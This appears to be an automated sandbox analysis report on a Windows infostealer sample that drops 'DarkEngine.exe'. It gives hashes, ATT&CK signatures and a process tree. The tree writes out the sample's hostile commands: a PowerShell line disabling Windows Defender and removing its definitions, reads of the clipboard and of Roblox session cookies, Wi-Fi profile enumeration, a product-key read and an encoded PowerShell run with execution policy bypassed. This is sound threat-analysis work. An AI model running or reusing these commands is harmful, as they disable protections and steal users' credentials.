Analysis
max time kernel: 139s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04/11/2024, 21:29

Static task
static1

Behavioral task
behavioral1
Sample: 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Resource: win7-20240903-en

Behavioral task
behavioral2
Sample: 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Resource: win10v2004-20241007-en

General
Target: 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Size: 8.5MB
MD5: d951faa8661e5491de72c8d067916c4d
SHA1: 438f90f3579cbc5a0e9ad852dcdb831ffe9545fa
SHA256: 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00
SHA512: c0675e116b2fe997f060a044c658536668150bf0cb72d40979e162e6a03f63a59a348f0a4a2364d4a237f0888db84ca637213eff2843ffca0026024adc3b1b2a
SSDEEP: 196608:ETcUUuvyn6cmN2cuBAgcSd3cWES7EY3uKgzk+3QQSedWJwagKQqxkYLfy:EwhuYR9zcGL3EYeKsk+3QmdWJwQLfy

Malware Config
Signatures

Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
  pid   Process
  316   powershell.exe
  4148  cmd.exe

Executes dropped EXE 1 IoCs
  pid   Process
  392   DarkEngine.exe

Loads dropped DLL 18 IoCs
  pid   Process
  392   DarkEngine.exe (x18)

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

  pid   Process
  3556  powershell.exe
  4532  powershell.exe
  3728  powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  13    ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.

Enumerates processes with tasklist 1 TTPs 4 IoCs
  pid   Process
  3736  tasklist.exe
  1944  tasklist.exe
  3196  tasklist.exe
  1192  tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  description           ioc                                           Process
  Key opened            \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh    netsh.exe
  Key queried           \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh    netsh.exe
  Key value enumerated  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh    netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
  pid   Process
  540   netsh.exe
  3588  cmd.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
  pid   Process
  5100  WMIC.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
  pid   Process
  4800  systeminfo.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs
  pid   Process
  3556  powershell.exe (x2)
  316   powershell.exe (x3)
  3784  powershell.exe (x3)
  4532  powershell.exe (x2)
  3864  powershell.exe (x3)
  3728  powershell.exe (x3)
  5092  powershell.exe (x3)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes

PID 3596: C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
  signatures: Suspicious use of WriteProcessMemory
  PID 392: C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
    signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    PID 3644: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      signatures: Suspicious use of WriteProcessMemory
      PID 3556: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID 3636: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      PID 3736: C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
    PID 1464: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      signatures: Suspicious use of WriteProcessMemory
      PID 2628: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic csproduct get uuid
        signatures: Suspicious use of AdjustPrivilegeToken
    PID 4632: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      PID 1944: C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
    PID 720: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      PID 3196: C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
    PID 2820: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      signatures: Suspicious use of WriteProcessMemory
      PID 5112: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        signatures: Suspicious use of AdjustPrivilegeToken
    PID 4148: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      signatures: Clipboard Data; Suspicious use of WriteProcessMemory
      PID 316: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-Clipboard
        signatures: Clipboard Data; Suspicious behavior: EnumeratesProcesses
    PID 2696: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      signatures: Suspicious use of WriteProcessMemory
      PID 1192: C:\Windows\system32\tasklist.exe
        cmdline: tasklist /FO LIST
        signatures: Enumerates processes with tasklist
    PID 2816: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      signatures: Suspicious use of WriteProcessMemory
      PID 4864: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 3588: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      signatures: System Network Configuration Discovery: Wi-Fi Discovery; Suspicious use of WriteProcessMemory
      PID 540: C:\Windows\system32\netsh.exe
        cmdline: netsh wlan show profile
        signatures: Event Triggered Execution: Netsh Helper DLL; System Network Configuration Discovery: Wi-Fi Discovery
    PID 1164: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "systeminfo"
      signatures: Suspicious use of WriteProcessMemory
      PID 4800: C:\Windows\system32\systeminfo.exe
        cmdline: systeminfo
        signatures: Gathers system information
    PID 4320: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command removed>"
      signatures: Suspicious use of WriteProcessMemory
      PID 3784: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <encoded command removed>
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
        PID 4120: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.cmdline"
          PID 312: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD55.tmp" "c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\CSC7907DE345AD406BBA96EF39B4AEEAC9.TMP"
    PID 4308: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      signatures: Suspicious use of WriteProcessMemory
      PID 2628: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 4356: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      signatures: Suspicious use of WriteProcessMemory
      PID 1864: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 4424: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      signatures: Suspicious use of WriteProcessMemory
      PID 544: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 3132: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 4304: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 4300: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
      PID 2780: C:\Windows\system32\tree.com
        cmdline: tree /A /F
    PID 860: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      PID 4532: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
    PID 316: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      PID 3864: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        signatures: Suspicious behavior: EnumeratesProcesses
    PID 1928: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "getmac"
      PID 312: C:\Windows\system32\getmac.exe
        cmdline: getmac
    PID 3956: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      PID 4472: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic os get Caption
    PID 3156: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      PID 4468: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic computersystem get totalphysicalmemory
    PID 3280: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      PID 3288: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic csproduct get uuid
    PID 4972: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      PID 3728: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
    PID 2216: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      PID 3864: C:\Windows\System32\Conhost.exe
        cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID 5100: C:\Windows\System32\Wbem\WMIC.exe
        cmdline: wmic path win32_VideoController get name
        signatures: Detects videocard installed
    PID 4540: C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      PID 5092: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        signatures: Suspicious behavior: EnumeratesProcesses
PID 2780: C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

Network
MITRE ATT&CK Enterprise v15
Credential Access
  Credentials from Password Stores: 1
    Credentials from Web Browsers: 1
  Unsecured Credentials: 3
    Credentials In Files: 3
Downloads
-
Filesize
296KB
MD5a3dcb03ecc79af7d967da0a8f9d3ab88
SHA1d6514b6d799669f8a9bf7a7cef5b48353e3e6e59
SHA25662132408456db932dc6d60378efdb13145f0a045f1c72ea797383ce4ffbc1b84
SHA5122d42398b9f8ddc9fc12240f4332683d5902d2caaf86fbf9f0a834c524d45ac73ed0a129b817aaf6cc9fa34af15045b3d41249ff2120599b7e700d11424e46c88
-
Filesize
24KB
MD5a51464e41d75b2aa2b00ca31ea2ce7eb
SHA15b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA25616d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff
-
Filesize
258KB
MD58a19e824710154198418a50bb757e990
SHA1c4c208e4a658d42bf57581232251070489848b50
SHA2567f0dc805de4b709d6f1445f59346ae888120ef20dc03f49331064c76edae6da3
SHA512ceb04c2125dc70500b12c6f27a5112ea6286707e01582b0dfaa55f40be53e78c8361486830a68d05db82e0076923383c32d17a9ecf5fc99ebc1425e8636540b7
-
Filesize
426KB
MD5f557c2ec806b5cf484d8baf37fabb3bb
SHA1f4b8ba286fef44cadf5f6462c3b9345ef0d9e050
SHA25600d324a0db7f1e39421ef646076da30180d3e46fabefc2c8f2e0d2876df6cd34
SHA5122256550b10166f6d2b5cb8b20604e69f70c25816f556107e2f4999afc961d27face5a9a3a7bed1ef693a2030444460224ac54063af84b9bf1dacd4c2006f94da
-
Filesize
652B
MD53906d4e850669dce34d06900e2f795cc
SHA16003a01e2d06b36014592336200fd8ffadbd17d5
SHA2563ea094d8b793093719e49c6e0cd0a03928f5b0bbe0accfe9abbb7fb6f5e1c1dd
SHA5122f197565b38c507b25098df3bda70d7d7936aef19ea3070c54a2b080ab578319de5f57210954afb1cfbfc569a1ee62ab053e85fc7a7fa23ebf817fac2e212bcb
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD529ef6c562ef3eef49a6673b4f3b2b429
SHA1cf5526dca6f4d89ec3d153c7c39b32d3d7c07129
SHA256ae881df7b9445e19c4224e7d6c1b09caeb3c5cad111f133478fe0139d5800e27
SHA5124dc8cc6880fb6d53e7d6e5e583a5961724439fa1092291ad03f85d9d65d195f29ba2340945120c3473a0d9f3815555902906e28a15b40e0a34201d4bea05c5fa